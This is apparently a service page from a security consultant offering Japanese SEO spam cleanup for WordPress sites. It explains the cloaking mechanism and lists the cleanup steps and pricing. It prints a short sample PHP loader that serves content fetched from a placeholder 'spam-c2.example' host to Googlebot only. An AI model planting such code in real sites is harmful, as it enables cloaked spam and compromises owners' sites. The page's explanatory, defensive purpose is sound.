Why does Google show Japanese characters for my site?

An attacker injected cloaked spam pages that serve Japanese-language content to Googlebot while showing your normal site to regular visitors. The injection usually rewrites the WordPress sitemap and adds hundreds of synthetic URLs Googlebot then crawls and indexes.

Is Japanese SEO spam the same as a pharma hack?

Mechanically similar — both are SEO-spam campaigns that abuse a compromised site for backlinks and ranking — but the payload differs. Japanese SEO spam pushes counterfeit goods (often Japanese-language). Pharma spam pushes erectile-dysfunction and prescription-drug pages. The cleanup approach is the same.

Will the spam come back after cleanup?

Not if the entry vector is closed. The infection usually arrives via a vulnerable plugin or stolen admin credential. Every cleanup includes vector identification and hardening so the same hole can't be reused.

How long until Google removes the bad results?

After cleanup, the bad URLs go to 404 and are removed from the index over the following crawl cycles. I submit reconsideration requests to Google Safe Browsing and request indexation through Search Console; the timeline is set by Google, not by us, but most sites recover within a few weeks.

Japanese SEO spam · cloaked · cleaned

Japanese SEO spam removal.

Manual removal of the Japanese SEO spam injection. File-and-database cleanup. Sitemap purge. Entry vector identified. Reconsideration requests submitted. Flat $279.

Start a cleanup How the infection works

Mechanism

What 'Japanese SEO spam' is, technically.

An attacker plants a PHP loader on your site (usually in wp-content/plugins/ or wp-content/uploads/). The loader generates thousands of synthetic pages with Japanese keywords and Japanese product titles. It rewrites your sitemap so Googlebot finds them. Real visitors never see the spam — the loader checks the User-Agent and serves your normal site to humans.

By the time you notice, Google has indexed hundreds or thousands of Japanese-language URLs on your domain. Search Console emails a security warning. Rankings drop. The 'Hacked: Content injection' label appears in Search Console.

Typical cloaking loader

01 <?php
02 // Serve spam only to Googlebot. Real users see the normal site.
03 if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {
04     $payload = file_get_contents('https://spam-c2.example/jp/' . $_SERVER['REQUEST_URI']);
05     echo $payload;
06     exit;
07 }

What I remove

Every place this infection hides.

File loaders
Obfuscated PHP in plugins, mu-plugins, themes, and uploads. Diff-read at the byte level — filename obfuscation is irrelevant.
Database
Spam content injected into wp_posts, malicious autoloaded wp_options entries, suspect wp_usermeta.
Sitemap
Generated synthetic sitemap entries removed; clean sitemap regenerated and resubmitted to Search Console.
Htaccess
.htaccess and nginx rewrite rules that redirect Googlebot or specific paths — reverted.
Admin users
Sleeper administrator accounts created by the loader — removed. All remaining admin secrets rotated.
Entry vector
Vulnerable plugin or stolen credential identified and closed. Without this step, the same hole gets reused within weeks.

Pricing

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Start a cleanup

Monitoring

$29 / mo

per site, cancel any time

Continuous monitoring, hardening, one cleanup per year included.

Get protected

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

See all services →

Email [email protected] or use the contact form.